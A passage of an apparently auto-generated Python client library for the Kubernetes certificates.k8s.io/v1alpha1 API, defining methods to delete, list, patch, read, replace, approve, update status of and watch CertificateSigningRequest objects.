kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_certificates_v1alpha1_certificate_signing_request_with_http_info(name, body, **kwargs)
else:
(data) = self.delete_certificates_v1alpha1_certificate_signing_request_with_http_info(name, body, **kwargs)
return data
def delete_certificates_v1alpha1_certificate_signing_request_with_http_info(self, name, body, **kwargs):
"""
delete a CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_certificates_v1alpha1_certificate_signing_request_with_http_info(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the CertificateSigningRequest (required)
:param V1DeleteOptions body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: UnversionedStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_certificates_v1alpha1_certificate_signing_request" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `delete_certificates_v1alpha1_certificate_signing_request`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `delete_certificates_v1alpha1_certificate_signing_request`")
collection_formats = {}
resource_path = '/apis/certificates.k8s.io/v1alpha1/certificatesigningrequests/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UnversionedStatus',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def delete_certificates_v1alpha1_collection_certificate_signing_request(self, **kwargs):
"""
delete collection of CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_certificates_v1alpha1_collection_certificate_signing_request(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: UnversionedStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_certificates_v1alpha1_collection_certificate_signing_request_with_http_info(**kwargs)
else:
(data) = self.delete_certificates_v1alpha1_collection_certificate_signing_request_with_http_info(**kwargs)
return data
def delete_certificates_v1alpha1_collection_certificate_signing_request_with_http_info(self, **kwargs):
"""
delete collection of CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_certificates_v1alpha1_collection_certificate_signing_request_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: UnversionedStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['pretty', 'field_selector', 'label_selector', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_certificates_v1alpha1_collection_certificate_signing_request" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/certificates.k8s.io/v1alpha1/certificatesigningrequests'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UnversionedStatus',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def get_certificates_v1alpha1_api_resources(self, **kwargs):
"""
get available resources
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_certificates_v1alpha1_api_resources(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: UnversionedAPIResourceList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_certificates_v1alpha1_api_resources_with_http_info(**kwargs)
else:
(data) = self.get_certificates_v1alpha1_api_resources_with_http_info(**kwargs)
return data
def get_certificates_v1alpha1_api_resources_with_http_info(self, **kwargs):
"""
get available resources
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_certificates_v1alpha1_api_resources_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: UnversionedAPIResourceList
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_certificates_v1alpha1_api_resources" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/certificates.k8s.io/v1alpha1/'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UnversionedAPIResourceList',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def list_certificates_v1alpha1_certificate_signing_request(self, **kwargs):
"""
list or watch objects of kind CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_certificates_v1alpha1_certificate_signing_request(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1alpha1CertificateSigningRequestList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_certificates_v1alpha1_certificate_signing_request_with_http_info(**kwargs)
else:
(data) = self.list_certificates_v1alpha1_certificate_signing_request_with_http_info(**kwargs)
return data
def list_certificates_v1alpha1_certificate_signing_request_with_http_info(self, **kwargs):
"""
list or watch objects of kind CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_certificates_v1alpha1_certificate_signing_request_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: V1alpha1CertificateSigningRequestList
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['pretty', 'field_selector', 'label_selector', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_certificates_v1alpha1_certificate_signing_request" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
resource_path = '/apis/certificates.k8s.io/v1alpha1/certificatesigningrequests'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1CertificateSigningRequestList',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def patch_certificates_v1alpha1_certificate_signing_request(self, name, body, **kwargs):
"""
partially update the specified CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_certificates_v1alpha1_certificate_signing_request(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the CertificateSigningRequest (required)
:param UnversionedPatch body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1CertificateSigningRequest
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.patch_certificates_v1alpha1_certificate_signing_request_with_http_info(name, body, **kwargs)
else:
(data) = self.patch_certificates_v1alpha1_certificate_signing_request_with_http_info(name, body, **kwargs)
return data
def patch_certificates_v1alpha1_certificate_signing_request_with_http_info(self, name, body, **kwargs):
"""
partially update the specified CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.patch_certificates_v1alpha1_certificate_signing_request_with_http_info(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the CertificateSigningRequest (required)
:param UnversionedPatch body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1CertificateSigningRequest
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_certificates_v1alpha1_certificate_signing_request" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `patch_certificates_v1alpha1_certificate_signing_request`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `patch_certificates_v1alpha1_certificate_signing_request`")
collection_formats = {}
resource_path = '/apis/certificates.k8s.io/v1alpha1/certificatesigningrequests/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1CertificateSigningRequest',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def read_certificates_v1alpha1_certificate_signing_request(self, name, **kwargs):
"""
read the specified CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.read_certificates_v1alpha1_certificate_signing_request(name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the CertificateSigningRequest (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'
:param bool export: Should this value be exported. Export strips fields that a user can not specify.
:return: V1alpha1CertificateSigningRequest
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.read_certificates_v1alpha1_certificate_signing_request_with_http_info(name, **kwargs)
else:
(data) = self.read_certificates_v1alpha1_certificate_signing_request_with_http_info(name, **kwargs)
return data
def read_certificates_v1alpha1_certificate_signing_request_with_http_info(self, name, **kwargs):
"""
read the specified CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.read_certificates_v1alpha1_certificate_signing_request_with_http_info(name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the CertificateSigningRequest (required)
:param str pretty: If 'true', then the output is pretty printed.
:param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'
:param bool export: Should this value be exported. Export strips fields that a user can not specify.
:return: V1alpha1CertificateSigningRequest
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'pretty', 'exact', 'export']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_certificates_v1alpha1_certificate_signing_request" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `read_certificates_v1alpha1_certificate_signing_request`")
collection_formats = {}
resource_path = '/apis/certificates.k8s.io/v1alpha1/certificatesigningrequests/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'exact' in params:
query_params['exact'] = params['exact']
if 'export' in params:
query_params['export'] = params['export']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1CertificateSigningRequest',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def replace_certificates_v1alpha1_certificate_signing_request(self, name, body, **kwargs):
"""
replace the specified CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_certificates_v1alpha1_certificate_signing_request(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the CertificateSigningRequest (required)
:param V1alpha1CertificateSigningRequest body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1CertificateSigningRequest
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.replace_certificates_v1alpha1_certificate_signing_request_with_http_info(name, body, **kwargs)
else:
(data) = self.replace_certificates_v1alpha1_certificate_signing_request_with_http_info(name, body, **kwargs)
return data
def replace_certificates_v1alpha1_certificate_signing_request_with_http_info(self, name, body, **kwargs):
"""
replace the specified CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_certificates_v1alpha1_certificate_signing_request_with_http_info(name, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the CertificateSigningRequest (required)
:param V1alpha1CertificateSigningRequest body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1CertificateSigningRequest
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_certificates_v1alpha1_certificate_signing_request" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `replace_certificates_v1alpha1_certificate_signing_request`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `replace_certificates_v1alpha1_certificate_signing_request`")
collection_formats = {}
resource_path = '/apis/certificates.k8s.io/v1alpha1/certificatesigningrequests/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1CertificateSigningRequest',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def replace_certificates_v1alpha1_certificate_signing_request_approval(self, body, name, **kwargs):
"""
replace approval of the specified CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_certificates_v1alpha1_certificate_signing_request_approval(body, name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param V1alpha1CertificateSigningRequest body: (required)
:param str name: name of the CertificateSigningRequest (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1CertificateSigningRequest
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.replace_certificates_v1alpha1_certificate_signing_request_approval_with_http_info(body, name, **kwargs)
else:
(data) = self.replace_certificates_v1alpha1_certificate_signing_request_approval_with_http_info(body, name, **kwargs)
return data
def replace_certificates_v1alpha1_certificate_signing_request_approval_with_http_info(self, body, name, **kwargs):
"""
replace approval of the specified CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_certificates_v1alpha1_certificate_signing_request_approval_with_http_info(body, name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param V1alpha1CertificateSigningRequest body: (required)
:param str name: name of the CertificateSigningRequest (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1CertificateSigningRequest
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'name', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_certificates_v1alpha1_certificate_signing_request_approval" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `replace_certificates_v1alpha1_certificate_signing_request_approval`")
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `replace_certificates_v1alpha1_certificate_signing_request_approval`")
collection_formats = {}
resource_path = '/apis/certificates.k8s.io/v1alpha1/certificatesigningrequests/{name}/approval'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1CertificateSigningRequest',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def replace_certificates_v1alpha1_certificate_signing_request_status(self, body, name, **kwargs):
"""
replace status of the specified CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_certificates_v1alpha1_certificate_signing_request_status(body, name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param V1alpha1CertificateSigningRequest body: (required)
:param str name: name of the CertificateSigningRequest (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1CertificateSigningRequest
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.replace_certificates_v1alpha1_certificate_signing_request_status_with_http_info(body, name, **kwargs)
else:
(data) = self.replace_certificates_v1alpha1_certificate_signing_request_status_with_http_info(body, name, **kwargs)
return data
def replace_certificates_v1alpha1_certificate_signing_request_status_with_http_info(self, body, name, **kwargs):
"""
replace status of the specified CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_certificates_v1alpha1_certificate_signing_request_status_with_http_info(body, name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param V1alpha1CertificateSigningRequest body: (required)
:param str name: name of the CertificateSigningRequest (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1CertificateSigningRequest
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'name', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_certificates_v1alpha1_certificate_signing_request_status" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `replace_certificates_v1alpha1_certificate_signing_request_status`")
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `replace_certificates_v1alpha1_certificate_signing_request_status`")
collection_formats = {}
resource_path = '/apis/certificates.k8s.io/v1alpha1/certificatesigningrequests/{name}/status'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1CertificateSigningRequest',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def watch_certificates_v1alpha1_certificate_signing_request(self, name, **kwargs):
"""
watch changes to an object of kind CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.watch_certificates_v1alpha1_certificate_signing_request(name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the CertificateSigningRequest (required)
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: VersionedEvent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.watch_certificates_v1alpha1_certificate_signing_request_with_http_info(name, **kwargs)
else:
(data) = self.watch_certificates_v1alpha1_certificate_signing_request_with_http_info(name, **kwargs)
return data
def watch_certificates_v1alpha1_certificate_signing_request_with_http_info(self, name, **kwargs):
"""
watch changes to an object of kind CertificateSigningRequest
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.watch_certificates_v1alpha1_certificate_signing_request_with_http_info(name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the CertificateSigningRequest (required)
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
